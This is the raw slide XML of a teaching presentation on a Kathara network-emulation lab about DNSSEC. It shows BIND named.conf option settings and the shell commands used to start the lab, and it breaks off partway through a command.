              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B3574D-7185-9101-B3F4-AF70EFF08D78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBABF3A6-17FB-7E89-4E6A-CDD445148FD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{888A92FB-5FB3-3147-0339-E7D605FEEB0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105618779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7F35CB-3D67-9032-C417-43A14F646351}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B196AE6A-31F4-9DB5-D8C7-3DB75713DF92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D08904C-4F13-E03B-28F8-0C762963996D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84A1823C-F930-BA5D-CE98-6AA4CFFB4378}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C0C1612-7308-EC0B-4188-0BE0DC768786}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="2282726"/>
            <a:ext cx="7087578" cy="2292548"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="1000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03895F9B-2367-7D03-A2E9-2625EAF19754}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="942"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>O</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>options {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    directory "/var/cache/bind";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    key-directory "/var/cache/bind/keys";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    allow-recursion { 110.0.0.0/24; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-validation no;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    listen-on-v6 { none; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAA29FAD-DE08-093F-E31E-F2FEBCC1F9EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3837" cy="151"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf.options</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109605051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FAB78B-3AD1-9016-506C-5B592047A5B7}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61D964FB-D0F3-50BB-916A-ED8B631B3234}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>tart the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18437" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55F6B3B4-08AA-A333-BA4C-1B561186D3EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>start the lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t>open any browser on the host machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" noProof="0" dirty="0"/>
              <a:t>localhost:3001 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9E53D95-56E8-DDBB-D191-97B0EBD32A49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04E71B68-D33E-E0FF-8CC1-E4AE4D219B47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A02AD9D-D683-BF6F-CD78-52CB470D1A0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2191793"/>
            <a:ext cx="10972800" cy="1237207"/>
            <a:chOff x="607480" y="2378845"/>
            <a:chExt cx="10972800" cy="1237207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B1F9FC2-2DB8-EF70-68E7-4B95F93C0A1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2668294"/>
              <a:ext cx="10972799" cy="947758"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>user@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:~$ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cd </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara-dnssec</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>user@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:~/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara-dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
